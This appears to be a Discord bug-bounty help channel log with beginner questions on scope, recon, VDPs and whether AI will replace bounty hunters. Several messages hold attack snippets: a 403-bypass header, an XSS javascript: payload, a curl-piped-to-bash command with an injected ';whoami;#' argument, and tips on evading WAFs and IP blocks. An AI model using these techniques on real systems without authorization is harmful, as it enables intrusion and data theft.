Then what happens if someone comes along tomorrow, finds the same issue, and uses it to dump that PII? You're morally responsible for that just as surely as if you did it yourself. If you knew something that could have stopped it and chose to do nothing then like it or not, that blame is also on you.

For the record, I do agree that a big org using a VDP instead of a bug bounty programme is a dick move, although I wouldn't call it "petty". I also don't think they automatically owe you money for voluntarily finding flaws for them -- although it's obviously courteous of them to offer it.

That said, stooping to their level and refusing to use your knowledge of an active vuln to help them makes you just as bad.

Again, neither a VDP or a BBP is the only line of defence... Or, if it is, they have serious problems lmao.
Don't overestimate the role BBPs play in a security architecture. In the grand scheme of things they mean very little to an org. Basically a nice little bonus rather than something to be directly relied on.

If one org has decided that they don't need a BBP, well, that's their decision 🤷‍♂️

I would always argue that if you're not using a BBP then publishing a VDP is a sensible option though, because it means that if an ethical researcher does find something then they feel safe to report it.

Then again, I would also argue that you should voluntarily reward said researcher for their expertise, regardless of whether you want people to be actively hunting on your platforms 🤷‍♂️

Yes, it's a sensible option imo -- in many cases at least. Just up to them whether they go that route. At the very least most countries require them to get pen tested frequently if they're handling sensitive data.

That said, think about it this way:
Let's say you were out walking and the path took you underneath a road or a rail bridge. If you saw that one of the struts was rusted almost completely through and looked to be close to collapse, would you report it, or just keep walking?
Would you expect to be paid for reporting it? What happens if you don't report it and a week later that bridge collapses letting a train fall down, killing hundreds of people? Would you feel responsible for that, even though you're not a bridge inspector employed by the state to go and find those issues?

Arguably the professionals (pentesters for our industry) should have spotted that issue. The bridge should have been shut (system not been allowed to go live) until it was confirmed to be safe. But for whatever reason that hasn't happened.

That's the role that BBP and VDP play. They're an unreliable way of finding the flaws that have either been missed, or have developed after testing occurred -- counting on the good will of the "public" to stop a catastrophe that slipped through the gaps of the official testing. BBP are just a way of incentivising people to actually go and look for issues, rather than just reporting them when they find them.

thanks

Gave +1 Rep to @spiral shuttle (current: #65 - 105)

what is rep

How likely are bug bounties to be replaced by AI? and in how many years? Is it worth starting in 2024?

Don't know about it being replaced by AI, but I will be starting my first bug bounty later this year

My bet is that absolutely a large chunk of the market will get replaced. It's the ideal application for LLMs. Systems that you interact with using text, no human intermediary, in addition a perfect environment for automated training at scale with auto-generated boxes, not limited by any human factors (like having audio transcript for training).

I expect much faster progress in this area than for example in customer service. AI will do at a minimum the low hanging fruits at a speed and price that humans aren't gonna compete with. Including detailed reports with instructions for remediation. I have no doubt by the end of the decade that's gonna be standard.

There's gonna be room for top experts for many years to come, but that's not gonna help most.

Hmm sounds like we're all doomed?

...

Only if you have that outlook.

People already use automation tools for searching for bounties, AI would just be an upgrade.

I might be wrong. I wouldn't bet a penny against my prediction, I'm pretty sure it's gonna happen. Time will tell. Pretty soon.

But there's many other jobs in IT security.

But there's always gonna be zero days which will never be found using automation right

Yes and No.

This argument is equivalent to "people already use horse drawn carts, the automobile would just be an upgrade".

It's meaningless unless we define how much of an improvement the "upgrade" is.

And also since most people develop their own automation tools there's probably never gonna be one perfect tool that does it all

The automobile was an upgrade though.

One that changed the world and made horse drawn carts obsolete within a lifetime, yes.

Thank you for agreeing it was an upgrade, have some free rep.

Gave +1 Rep to @spiral shuttle (current: #54 - 130)

Literally everything I decide to do there's people telling me It's either too hard, too late, or that It's gonna be replaced by AI

I am completely lost.

Do what you want to do.

Don't base it on what somebody else wants things you should do.

Aa I said "just an upgrade" is a meaningless statement unless you define "upgrade" and the consequences that come with it.

Who knows, maybe the lack of bugs found will bore you and put you off searching.

I will but i have to find out what makes the most sense

Maybe it will drive you, who knows?

Im pretty sure help desk is way more competitive than bug bounties

Reality is you can't know, any decision you take is gonna be a gamble and you're gonna have to completely re orient yourself in your life anyways. If it's not AI bug hunting then something else.

Okay, I'll just finish my A+, and do bug bounties in my free time

That's the best way to tackle them IMO

I don't care what anybody says,

Bug bounty is not a sustainable income.

lets destroy all the IA plateforms like chatGPT then 😹 🙏

Destroy?

Also if I find a few bounties I could brag about it at work, and ask for a Pentest+ voucher

Or have enough money from the bounties you can purchase it yourself.

Win/Win.

Unless you fail....

but who doesnt love free stuff right

yeah with nuclear bomb or idk

I'm pretty sure a nuclear detonation would be a bit overkill...

All AI will eventually be vulnerable and will need humans to protect it

gg to IA then :(

yeah probably

technology is too complex to be 100% un-hackable in my opinion

so while AI will replace a lot of jobs, hackers will hack the AI, and more security jobs will appear

i hope so

That math doesn't work out. There's not more factory jobs today because industrial robots need people to programm and maintain them. There's less. Much less.

i dont want to be useless when i got all my certifications

industrial robots today have nothing in common with the extremely complex AI robots in the future

10 years from now

so the math does work out

more robots = more security needed

Basic economics dictates that if using AI required more staff to develop, maintain and secure it than the staff it makes obsolete, AI is not going to be used.

If your assumption is correct you solved the problem you're afraid of.

Depends if it manages a higher profit.

Also the power usage is insanely high

But probably AI will take jobs. Get some others in return. In the end high unemployment is also bad for companies that profit from AI because it hurts the economy overall. Will end up balancing itself out.

The amount of jobs AI will replace will be huge that's true

But it 100% will create security jobs

Making Tech even a better field in the future than it already is

The question is, which jobs in Tech are in danger

Flip a coin I guess

Web development will surely be one of the first to be replaced

Can someone with knowledge about ssrf send me a private message? I think I found a vulnerability, but I'm not sure, I have a question☝️

bro tryhackme legit tweaking

man i thought premium users had it good, was 12 bucks worth it for issue like this. (the issue is that nothing wont run but they work on other machines

If I wanna do bounty hunting can I skip Windows/Linux CTFs?
And just focus on web app CTFs?
Or is that a bad idea

No that’s a good idea, you won’t ever really need to do boot2root if you’re just doing web bounties

any way to bypass?

im tryna do (site)/etc/whatever and it rejects it just cuz my ip

I'm not sure what this is for, but we won't help you with the bounties.

You're asking us to do work that you're getting paid for

lord forgive being generous

its a question, not really the whole thing

just asking around if anyone knew

Can you provide the scope for thr Bug Bounty?

wdym scope

sry im new to this

Are you trying to get a bounty on a random website?

no, its on hackerone.com

its listed

Hi

Then you'll need to share the scope set by hackerone.

Just bare in mind that any help you recieve, somebody may just submit the report for the bounty

a way to bypass 403 might be by using the HTTP header X-Forwarded-For: 127.0.0.1

thanks man

Gave +1 Rep to @brisk shuttle (current: #1400 - 2)

could you check your dms?

okay

what about split bounty with you ?

Where's the guarantee though? Only one person can submit and you're trusting the other person, that you don't know, will a) give you the money at all and b) will give the appropriate percentage. Things get even more convoluted if you're not in the same country as well as a bunch of other factors.

its easy in hackerone report I invite you then split the bounty read this: https://docs.hackerone.com/en/articles/8457618-collaboration

That must be newer, I don't remember it being there a while ago. It still seems like there is room for dispute though as each party is rating contributions? Still something I would be wary of.

I'd be open to collaborating on a bug bounty

at one point I had a very large map of Tesla's network

https://bugcrowd.com/tesla

Just google 403 bypass there's a bunch of ways and/or tools you can use

like which?

google.com

where 2 learn how to bypass WAF's?

please, if you actually want to help me, do not just tell me to google it, ive already tried that

you dont "learn" how to bypass WAFs unfortunately

theres no course out there for it

you just bash your head in until a payload works

got a url vulnerable to XSS

anyone wanna colab and help me?

anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!

Please don't spam the same thing in multiple channels.

on hackerone if i wanna join a bug bounty program

do i just start immediately or is there some sort of legal forms and consent i have to do

I think there are programs that you can join immediately. However, you have to be mindful of the scope of each program so as not to have your tests be tagged or flagged as a potential attack.

Yea there's a few newer video's out there how to bypass the majority of waf's I'll have to find the video and I'll post it... Pretty easy actually

If you want to dm I can help you try to escalate...

Here's that video ... https://m.youtube.com/watch?v=VKnX1vj65Ro

They also have a "playground" where you can practice the techniques shown...

thanks man

Hi, I have just configured the header for my requests, but I cant still see my custom header in my request header

I used Custom Header Extension

Not familiar with the tool but Burp definitely has an option for that

Match and Replace rules under Proxy Settings

Click add and it has a placeholder that teaches about adding a new header

thx

Gave +1 Rep to @lilac spindle (current: #22 - 380)

hello everyone! When I want to make a transaction with the inscope url given in a bug bounty target, are sub domains and directory urls included? So, is it necessary or prohibited to scan sub domains and directories via inscope url (main domain)? Are the sub domains and directories I found considered outscope?

A scope that states: "*.target.something" includes subdomains and directory urls. If the scope is just "target.something" then it only includes directories like target.com/directory etc.

Hi guys im learning different web vulnerabilities , can someone tell me which method is best to learn

1. Learn a web vuln and become perfect(100%) at it (doing extra labs, ctf etc) .
   Or
2. Learn a web vuln til intermediate lvl then go to next vuln , and when done all vuln then go for advance lvl

thank you!

Depends on for which purpose, if you're looking into bug bounties I think the first option is an okay approach, if you're looking to leverage the knowledge to get a job then definitely the second one.

If I managed to insert javascript to execute XSS, but when open source code it appears and not execute, is a way to make the payload execute?

I dont know how to explain, first time the website have seen that I want to insert <> ", but once I managed to insert it dont execute, it appear on source code but nothing

And I dont know if it worth or not to continur

Could something be filtering your payload from firing? Were you able to breakout of the element? Is it being reflected anywhere on the screen or just source? If u want you can dm me and I can help try to pop the xss ...

This is how it looks

In the first instance the website didnt let the permission to use <>" but it works by modifying the request with burp

First thing that pops into my head is trying to see if you can create a scriptable context within the html tag you are in

for example: <a href="javascript:prompt(document.domain)">

I'd also use portswigger labs as a reference they've got some pretty good stuff on xss

I'd look at the console why its not firing.

quick question

if you have smthing like value="" then when you insert a script wouldnt the double quote cause a syntax error?

https://youtu.be/YU4QBjg703U?si=iFh-G3L1pdmwKomR

+1

Hey,
I am doing a bbp and I am pretty desperate as I was working on this one endpoint for too long to drop it so I am writing here. So I had found an interesting functionality on bbp and idk how to exploit it and if it is even possible. So in the website there is an error for incorrect login like Error: invalid username or password. And I found a way to change that error to whatever (it is in parameter in website like website.com/login?error=Invalidusername) so I can change it to whatever and I began trying to get xss on the website, but they encode every input I make (for example < " ' all that) and I would have moved on but what is interesting is that I am in div element not in some input of whatever so like <div> I am here </div> and I don't wanna move on because I think that there should he a way to do something.

If anyone has any ideas I would be very interested to hear them.

Thank you very much

maybe use xsstrike?

I will try thanks for help

If it's being encoded there's nothing you can do, it's being handled as text

Oh that's unfortunate... Thanks for help

Gave +1 Rep to @fast fable (current: #14 - 540)

anyone been able to use OpenSSH cve POC?

cant use it for the life of me

You referring to RegreSSHion? Have you checked that your target is vulnerable (e.g., 32-bit, etc.)?

yep

it is

but i still cant use the POC

Haven't looked at it myself so let's wait for others to chime in.

aight

Maybe post what error youre getting?

it jsut goes through

and gives me the terminal prompt again (but not a reverse shel)

My theory is the exploit failed but it doesn’t really check if it did fail that’s why you get that scenario.

nah cuz it took like 2 minutes

istn it suppoised to take hours?

cuz i thought that memory corruption takes centuries

yes, it most likely failed

I have a pretty massive question about bug bounties specifically so i figured this was the best place to put it

I am trying to find the specific IP address for a domain. When I run the host command I get:
example.com is and alias for example.cloudnet.com followed by four IPv4 addresses and a litany of IPv6 addresses
I receive the same output for:
nslookup www.example.com
However when I run a reverse dns lookup on Viewdns (still looking up www.example.com) I recieve two IPv4 address associated to what appears to be amazon associated domains that are not matching any of the previously found IPv4 addresses
Ultimately my question is what can I do with this information, why is it contradicting, and how can I find a singular IP address. I figured even if they were load balancing the requests it would still be associated to a singular address. I don't want to accidentally footprint something out of scope.

Looks like they’re running on elastic load balancing. Hard to get a single IP from that as ELB often doesn’t have static IPs iirc. Thats why the differentiating factor is the domain name for the ELB.

I am a noob Just getting started how can I get my hand into bbp?

Well to start, I would suggest learning about 1 or 2 web vulnerabilities like xss, SQL injection, idors, etc and how to find them... You can use some of the newer thm rooms or portswiggers labs for learning how to hunt for those specific bugs, after u feel like u know what you're looking for, then test out your luck on a target. If you are just learning I would suggest starting with a vdp instead of bbp, as a bbp will have a lot more competition and a higher chance of dupes, especially on any low hanging fruit...

Hi everyone!

Can you advise good bounty platforms for beginners? Preferably with some kind of on-boarding. If it was already discussed here, please link the post.

Also, are there any good vulnerabilities to start learning bug hunting with?

that's great advice

does vdp stand for Vulnerability Discovery Program?

Yes, there's a lot less competition on vdp's so there's the chance that some of the easy bugs like idors, xss, authentication misconfigurations, etc still exist on those. Now these may still exist bbp's but chances are they have already been reported. As far as platforms I would suggest hackerone bugcrowd or integriti. Targets I would suggest a company you are already pretty familiar with.

Thank you!

Gave +1 Rep to @lilac bough (current: #77 - 85)

I would also suggest checking out some of nahamsec's newer video's and engaging with his discord server, he just recently had a 5 week program going on where he chose 3 targets for the month, did a bunch of the initial recon for you and covered which bug to hunt for the week, there's live bug hunting sessions going on all the time...then once 5 week program was over 1 person out of the group was chosen to work for nahamsec as a web pentester... But heres the thing, the 5 week program went well and was extended so now there's monthly targets, he partnered with trickest and they scanned every bug bounty program and created a big database of recon on every "target" free to use ..

Is it worth buying his course on bug bounty?

Hello guys.
If this is the wrong channel i'm sorry.
I am testing for RCE because i have found a bash script on a page. When accessing it it will be downloaded with following content:

#!/bin/sh
DOMAIN=$1;
APPLICATION="MyApp";

cp -r /directory1/$APPLICATION/usr/hosts/customertemplate /directory1/$APPLICATION/usr/hosts/$DOMAIN;
chmod -R g+w /directory1/$APPLICATION/usr/hosts/$DOMAIN;

with curl i can send the parameter. My question now is: How can i manipulate the parameter to get (i.e. whoami) RCE?
Thank you for your help ❤️

What are you doing?

I found a bash script on a webpage. when i run curl i get following message:

curl -sSL https://URL-TO-BASH-SCRIPT.sh | bash -s -- ";whoami;#"
cp: cannot stat '/directory1/MyApp/usr/hosts/customertemplate': No such file or directory
chmod: cannot access '/directory1/MyApp/usr/hosts/;whoami;#': No such file or directory

how can i run a correct parameter? I mean its like a sql injection but it's on a bash script (no input sanitization)

Ok, which website?

Do you have permission to be doing this?

it's my companys website and yes i'm permitted to do penetration tests. i dont want to tell the correct url because of the might security issue

Then please ask for help inside your org, we won't know the setup of your website etc, so we're not really in the best place to assist.

Does it help you to know that the webserver is running ubuntu as setup? i just want to know how to pass the whoami parameter to proof RCE on that file.

Not at all, there is many different versions of Ubuntu.

In any case it doesnt look like rce more like you are running the script localy on your pc. Also curling and piping it into bash is very common for installing.

Ups sorry my bad 🙈 but thank you anyway

Guys I have a question
I'm a beginner at bug bounty
Does anyone have sources or courses on it

@grand knot you can try sources like nahamsec or jason hadix on youtube but the best way i believe you can get into bug-bounties is by jumping right in and practicing with black box rooms like ones from portswigger or vulnhub. tryhackme also has a bunch of amazing modules to learn from as well.

All of these resources are pinned if you want quick links^

guys, does anyone have an idea if these exploit count as a VM escape? CVE-2024-21111 / CVE-2024-21112. Says on Nist "allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox". So only local priv escalaption but not VM escape?

Hello, How can I update multiple product reviews using NoSQL manipulation technique on Mongo DB

Hey I am a full-time bounty hunter. I'd like to collab.
I found an sqli, we can escalate it. 😉

If you've found it, why do you need help to eacalate it?

just to collab bro but I'm almost done exploiting it

there waf was in place

and maybe motivating some ppl to start their bug bounty journey

If you'd like help, you'd need to share the scope.

If he shared scope here wouldn't that dox the company since he's already mentioned the bug... Sqli should be a high to crit finding anyways, but you could always look into SQLi => RCE for some additional impact..

we already dumped the database rn

and wrote the report

true

its already p1 so I'm sure I'll get the max payment

nice find

You might also be able to pop a shell from it

hello anyone up?

On the other hand, if they don't share the scope how can you ensure they're doing something legal and ethical?

Also. I wasn't speaking as a member willing to help, I was speaking as a moderator ensuring nobody is going to help anybody not be ethical and legal

Your point is valid and I get it. Just trying to show another perspective, since he already mentioned the bug he's found, revealing the scope here would actually be considered unethical... Even in a private dm that could still be considered breaking the rules set by the bug bounty program, unless you were actually collaborating together....

Id also be careful with that one depending on the table that was dumped, because now you could possibly have access to confidential information.... And depending on the scope, would be considered out of scope.... For example here's a snippet from NBA bbp ``` - Do not access NBA customer, employee, or confidential information.

• Do not intentionally view or access any data beyond what is needed to prove the vulnerability.```

Those who work a 9-5, what's your schedule for learning/live testing look like? Currently I'm thinking a spend an hour or two a day after work learning and doing labs and then try live targets on weekends to try to build on what I've learnt during the week

This is pretty much what my schedule looks like, the key is to just be very deliberate with your testing when you do have the time and automating some of the repetitive tasks so you can focus on actually finding bugs. Also, keep your expectations at a realistic level, you won't make as much money as full time hunters and that's ok. But it's been a nice side hustle for some extra play money here and there.

Thanks for the insight mate. Currently I've just been doing VDPs because of the knowledge gap and time gap until I'm comfortable in a program. So no expectations about payouts yet hahaha. I just enjoy having permission to go ham on something and learn and poke at every little part of it, so the fun aspect is enough for me right now

Gave +1 Rep to @charred lichen (current: #1440 - 2)

what level of severity is reading /etc/passwd on a bounty site?

That mindset already puts you 10 steps ahead . You have to love the struggle lmao.

would it be considered sensitive data exposure ?

Let's gooooo. I do love it, just not enough hours in the sat hahaha. Or I ruin my sleep schedule

High/Crit

thank you

Gave +1 Rep to @charred lichen (current: #1090 - 3)

The biggest blessing is definitely just loving to learn and not being just satisfied that something works but needing to know the how and why. It's gotten me promotions at work and gotten me pretty far in a lot of other things

Not sure how useful this is since I haven't found my first real bug but something I read was put yourself in the shoes of the team that will be receiving the report and think of the impact something like that has for them. Like could it expose other things? Is it sensitive info. Could it be further exploited

Maybe that could give you an idea on how to make the report even better to get a definitive crit

i was just wondering since i doesn't have sensitive info like shadow does, just has user names.

Can you find anything more from there though? Like is it path traversal?

was a ssti

twig

poping shell doesn't work can just read files

I tried but it wasnt possible since there was a waf.. but maybe I havent tried enough.

and I found another sqli just now

I'd like to collab w someone who's good at scripting and owasp top 10

we can hunt on all programs ig

i am new in bug hunting, can anyone help me out with recon

I can help u

kindly dm

Here is something you could try for the waf https://m.youtube.com/watch?v=VKnX1vj65Ro

is there anyone willing to colab and build a little mini temporary team for bug-bounties for a while because im struggling heavily im looking to work with some people to help clear up how i might be approaching things and fix or improve my methodology for bug hunting.

please who knows anything about LFI attack

https://tryhackme.com/r/room/filepathtraversal might help

What’s your specific question?

i'm trying to perform LFI for an api endpoint that looks like this "/api/v1/user/change-avatar/", this allows me to upload an image for the avatar..bt whenever i try doing LFI command in burpsuite, it just resets it as the file that i put initially

I can help

Are you saying that when you send the request with the LFI command, the response shows the file that was put initially?

yhhhh

Probably truncation in the backend then

damn

is there a way to bypass

@codex you should try mapping out the upload process by using valid files and changing it slightly each time to get a good idea of why it works. this might work and if i doesn't it should help on getting a better understanding of it so that you could possibly come up with your own bypass.

@gritty bough just a suggestion though

why do characters like < turn into <?

ah i see

i am guessing there's no way to bypass it too right?

same but eventually we'll find out

what was that

oh a spammer

No worries, thank you for notifying. Looks like they have been dealt with.

Gave +1 Rep to @glass wraith (current: #185 - 36)

what do I need to learn to be a bug bounty hunter?

like what libraries in JS?

and what programming languages?

Burp suite, owasp 10, maybe some portswiggers labs .... It wouldn't hurt to know some js and maybe some python but if you get good at spotting anomalies then all you really need burp or any other proxy tool.

I'm starting portswigger academy and what libraries should I learn in Python and JS?

This is all going to depend on the app and/or what you are trying to do... I mean it's not a necessity... I've found bugs without knowing either... I've just recently got into js to get a better understanding of how I can manipulate xss in certain frameworks... I think just being able to read js is enough to get started though...

so im starting to do bug bounties, if i nmap and dirb websites i get blocked after a few seconds of scanning... how do i work around that?

reduce the rate

is automated scanning allowed in scope?

ahh ok

yea they do say refrain from using automated tools...

they say that requests should be limited

but how would you go about enumerating things if not automated?

Manually

but like i want to enumerate a website how would i manually do that?

check out the dirb wordlist and go through one after the other?

how would you do a manuall nmap scan?

Sitemap, robots.txt, looking at the source code, guessing, seeing the network requests etc

I wouldn't do an nmap scan, most times infra isn't part of the scope

If it was, I'm not sure - I guess the level of "automation" would differ between each program, you could ask for clarification

yea like if a server had a service on port 4444 i would not find it unless i would nmap it no?

wouldnt that be the same in the end?

yea idk thats why im consfused when they say
"refrain from using automated tools
limit yourself about requests per second"

so i guess nmap would be fine if i can make it be slow

Yeah, that's what I mean by the "level of automation"..it's kinda up to debate what counts as automation, hence why I'd probably ask to clarify

i get DoS blocked if i nmap too much 😄

so i could do -T2?

Bro do more passive recon.... You could also grab endpoints from the js ... Also good idea to use a VPN if you go the scanning route so you don't get your IP blocked... You could get IP address using dig or similar... Check shodan on ip for open ports or something similar ... You could utilize online scanner for subdomains if it's wildcard scope... That way it's not all active recon and you get blocked before you even start hunting

I believe they are referring to automated scanners like sqlmap, dalfox, etc that send a bunch of blind payloads... Id also try looking into some of the subdomains maybe you find something that looks older and hasn't been tested yet... A lot of the low hanging fruit might've already been found on main app

Usually in a bug bounty scope and ROE, its specifically stated how automated tools should be configured. They would say to lower the amount of requests (e.g. 1 req/sec) so you need to limit your tooling to that. For example: gobuster uses the -t option to control the threads so you can limit your request tooling there. There is also sometimes explicit mention of adding a header (e.g. X-HackerOne: username) so that your requests are identified and youre not some random bot they will ban outright.

Makes sense, especially since im a noob

Hey I'm in bug bounty in an IIS website. I looked a bit for vulns and found the short name vuln. I used the Burpsuite extension and the target was vulnerable. The extension found 6 files. But I don't know in what format I should write the file. Here is the extension output (replaced the name of the target by redacted.com) :

[] Trying method "OPTIONS" with magic final part "/~1/.rem"
[] Trying method "POST" with magic final part "/~1/.rem"
[*] Trying method "DEBUG" with magic final part "/~1/.rem"

[+] Host "https://redacted.com/" is vulnerable!
[+] Used HTTP method: DEBUG
[+] Suffix (magic part): /~1/.rem

[*] Starting filename and directory bruteforce on "https://redacted.com/"
[i] File: SVNCSH~1.RUL
[i] File: REDACTED~1.RAR
[i] File: WEB~1.CON
[i] File: APPLIC~1.CON
[i] File: PACKAG~1.CON
[i] File: GLOBAL~1.ASA

[+] Bruteforce completed in 8 seconds
[+] Total time elapsed: 9 seconds
[+] Requests sent: 870

[-] No directories found

[+] Identified files: 6
|_ SVNCSH~1.RUL
|_ REDACTED~1.RAR
|_ WEB~1.CON
|_ Actual file name = WEB
|_ APPLIC~1.CON
|_ PACKAG~1.CON
|_ GLOBAL~1.ASA

I need to show impact can someone help me ?

Hey all, I am new to bug bounty, I was wondering if I could get some tips on how to get started. Really appreciate the help

There's are a few web hacking modules on thm. You could search them. They will teach things a XSS and SQL injection. OWASP top10 (2021) would also be a good room to learn about the type of vulnerabilities you can look for when doing bug bounties.

Thank you

Gave +1 Rep to @near spear (current: #41 - 183)

There's some useful posts in the pins. I'd recommend portswigger academy as well

Ack

did you use postman to confirm this was the right endpoint and it was indeed accessible?

can you reccomend a good VPN?

proton has a free tier you could use

okay, that's what I use.

hi

Hello what is your q?

i need help related bug hunting

idk but whatever i report they take it as P5

Have you demonstrated impact in your exploitability?

That is the one big thing companies that run BBP want

no not the impact but i just reported that i could get the sensitive information of their website that's it

Their report should state why it was accepted as P5. If not, you can further clarify it.

@rustic pebble
i am gonna get into VDP because i was searching for a XSS bug in evernote which BB in hackerone but i cant, So, i just changed to VDP and then need to go BB

nothin wrong with that

public bbps are pretty competitive
too many eyes all on the same thing

aside from the whole "good for gaining experience" thing with vdps, if they're done on a platform like h1, they can help be a gateway into more private programs that are less competitive and/or fresher targets

cool

if you know any of the websites to do VDP means kindly share

also if you're just wanting to mess around and don't care about getting paid, open source is a great target for simple disclosure, esp those that run a vdp through github advisories

not nearly as many people looking there so often easier to find things, depending on the type of software

honestly i've been too busy lately to even do any bounty work, so I can't name any specific programs
just the big platforms like h1 and bc where a lot of companies post

And then my main aim is to make my resume look good because i cant pay high paid certifications. So, i just jumped to VDP and add it in my resume instead of n numbers of certificates

thanks bruh

Gave +1 Rep to @rustic pebble (current: #58 - 127)

Exactly why I started on VDPs. The general consensus is oh you don't get paid! I mean if you're starting out you're more than likely not going to find the bugs that will get you paid anyway unless you get lucky

@ripe mountain if you wanna look for something not on a public platform like HackerOne/Bugcrowd you can also try a google dork like
intext:"vulnerability disclosure program" inurl:".com"

For the inurl part I put .com.au because I'm based in Australia and want to work on Australian VDPs but that's just personal preference

Thanks bruh

🍻

Hi

Hi

Anyone know if splunks vuln disclosure through hackerone pay bounties? Didn't get an invite to their private program yet, but can still submit through the embedded submission linked from the splunk page.

can anyone explain me IDOR vunerability and how to report for it ?

What’s your specific issue with it?

I mean private game in king of the hill should be private

but we can go and see them

is it a kind of IDOR ?

I don’t get what you mean sorry

If its koth inquiry specifically, #koth should be a better one

no it's not a specific

i mean if you start something privately

Then if anyone see that private thing

then what should we call it ?

let's take an example if you start a game with your friend privately and if everyone can see it then why it is private ?

That's the thing i was talking about

these both games are private

Can you actually join the game or is simply seeing the results? Is there any sensitive information you can see or retrieve or something you can leverage to gain further access? As it is, it is just the results which I don't think requires the level of protection you are looking for in this case.

I assume the "private" part is that it cannot be participated in by non-invitees, rather than meaning its presence is hidden

Or did you verify that such private matches are not accessible via the usual spectate interface, and you explicitly only accessed them by exploiting IDOR

okay

but what if someone else.I mean other person that is not in game hack machine and make winner who ever he wants?

is it still not considered as a bug ?

for me it's just visible points and other things but maybe there is someone who exploits vunerability and have access to machine IP too by that he can hack any machine and then he is a kingmaker.

I don't know who is this.But, there is someone who can see IP too.I don't know how>But, it's true

and i have faced this issue several time

someone made me king again and again even i'm not pawning any machinebecouse my openvpn doesn't work properly.

If you are still ignoring it.Then okay.I don't care too.

But, there is a vunerability in KOTH.

@stray kiln if you think there is a vulnerability, you can definitely submit a report. Check the docs I linked for help on the topic.

I know there is a vunerability but i don't know name of it and also i just have screenshots on it nothing else and also i don't know how to report it.can you help me with this ?

The intent here is not to ignore, but rather to understand the basis of the concern. As @lilac spindle pointed out, THM has a BBP where you can report it, but you'll need to provide more information on what was achieved, how it can be re-created, etc. for it to be actionable on THM's part (and for it to be prioritised accordingly once confirmed).

I know what you wanna say.But, i just want to know in this scenario for which vunerability i have to report ?

how did you discover the issue

what step-by-step process did you do to encounter it

I don't encounter any step

when i was playing with my friend at my home

we both try to hack machine

but our openvpn doesn't work properly.So, we both can't hack machine.But, suddenly someone put my friends name in king.txt file and he is showing as king in that game and he won.

and there is only two persons in game me and my friend

So, how can someone got ip to that machine and hack it too and put my friends name in king.txt file.That's my question.

and yesterday also someone put my name in king.txt file.I don't know my opponent is trolling me or someone else help me .but, it's done in continuous 3 games.That's shocking for me that's why i'm here.

IIRC.

It will automatically declare a winner if the game is not interacted with.

not like that someone put name of my friend in machine i confirmed it now

someone hacked machine and put his name

for a bug bounty / vulnerability report you would really need solid evidence of this at least

Ideally for a bug bounty you would provide a detailed report on step-by-step process to achieve whatever the given exploit is and show its results, so that the company can reproduce the exploit to verify that it exists and then fix it

to report a vulnerability, you would have to be able to demonstrate that it exists with evidence other than anecdotal report of something that seemed a bit weird

It does sound like the game just declared a winner because neither party interacted with it. You'd need evidence of another 3rd party joining the private game somewhere.

okay now i will try to find evidence next time.

Hello friends I’m new to bug bounty hunting which learning paths should I study?

I know the basics I want to grow my skills in bugs and ways to find them

Since XSStrike is abandomware, is it still good for finding XSS bugs?